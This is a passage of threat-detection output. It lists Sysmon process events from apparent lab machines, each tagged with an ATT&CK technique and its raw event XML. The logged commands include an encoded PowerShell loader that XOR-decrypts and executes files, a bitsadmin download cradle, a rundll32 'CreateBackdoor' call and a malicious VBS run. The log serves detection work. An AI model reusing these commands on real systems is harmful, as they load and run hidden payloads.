<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.193387Z"">
</TimeCreated>
<EventRecordID>4892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.184</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00109B328600</Data>
<Data Name=""ProcessId"">6020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T17:41:08.967692Z"">
</TimeCreated>
<EventRecordID>1966184</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1168"" ThreadID=""604"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 17:41:08.947</Data>
<Data Name=""ProcessGuid"">365ABB72-29B4-5C91-0000-0010289AC308</Data>
<Data Name=""ProcessId"">3748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-2209-5C91-0000-0020FA479E03</Data>
<Data Name=""LogonId"">0x39e47fa</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A4A-5C91-0000-0010455A0000</Data>
<Data Name=""ParentProcessId"">512</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:08:00.446150Z"">
</TimeCreated>
<EventRecordID>11126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:08:00.336</Data>
<Data Name=""ProcessGuid"">365ABB72-8B80-5CD3-0000-001065512A00</Data>
<Data Name=""ProcessId"">2264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8B77-5CD3-0000-0010E8FD2900</Data>
<Data Name=""ParentProcessId"">3836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.204919Z"">
</TimeCreated>
<EventRecordID>5982</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.164</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010B2E2FF00</Data>
<Data Name=""ProcessId"">2108</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T15:08:07.558917Z"">
</TimeCreated>
<EventRecordID>5532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 15:08:07.355</Data>
<Data Name=""ProcessGuid"">747F3D96-A357-5D45-0000-0010BD149A01</Data>
<Data Name=""ProcessId"">5396</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A356-5D45-0000-001014F99901</Data>
<Data Name=""ParentProcessId"">4056</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; eventvwr.msc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-12T15:06:49.447990Z"">
</TimeCreated>
<EventRecordID>143189</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2856"" ThreadID=""3608"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-12 15:06:49.415</Data>
<Data Name=""ProcessGuid"">747F3D96-BB89-5EBA-0000-001019683600</Data>
<Data Name=""ProcessId"">4688</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B086-5EBA-0000-0020BF9E0800</Data>
<Data Name=""LogonId"">0x89ebf</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-BB89-5EBA-0000-001042653600</Data>
<Data Name=""ParentProcessId"">1088</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe</Data>
